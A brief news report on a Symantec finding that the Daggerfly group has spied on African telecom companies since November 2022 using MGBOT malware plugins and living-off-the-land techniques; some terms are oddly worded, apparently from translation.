Symantec, a cybersecurity company, has released a report detailing that Chinese hacking group Daggerfly has been targeting telecommunication companies in Africa since November 2022 to collect intelligence data. This is according to a Symantec report, which linked the attacks to Daggerfly. The group has been using previously undocumented plugins from its MGBOT modular malicious environment, as well as abusing the Anydesk.
In these attacks, Daggerfly has been using Lotl Atak (Living of the Land) to deliver the payload for the next stage. It does this using Bitsadmin and PowerShell.
Once established in the system, Daggerfly creates constancy by generating a local account and deploying the MGBOT framework. The MGBOT structure includes an exe-thropper, DLL-loader, and connected plugins. The MGBOT multifunctional plugins can provide attackers with a significant amount of information about the compromised machine, such as browser data, keystroke registration, screenshots, sound recordings, and Active Directory Enumeration.
According to Symantec, “all of the above possibilities allow hackers to collect a significant amount of information from computers -victims. The functions of the plugins also show that the main goal of the attackers in this campaign is to collect data.” It added that telecommunication companies will always be a primary target for espionage campaigns due to the potential access they provide to the communications of end-users.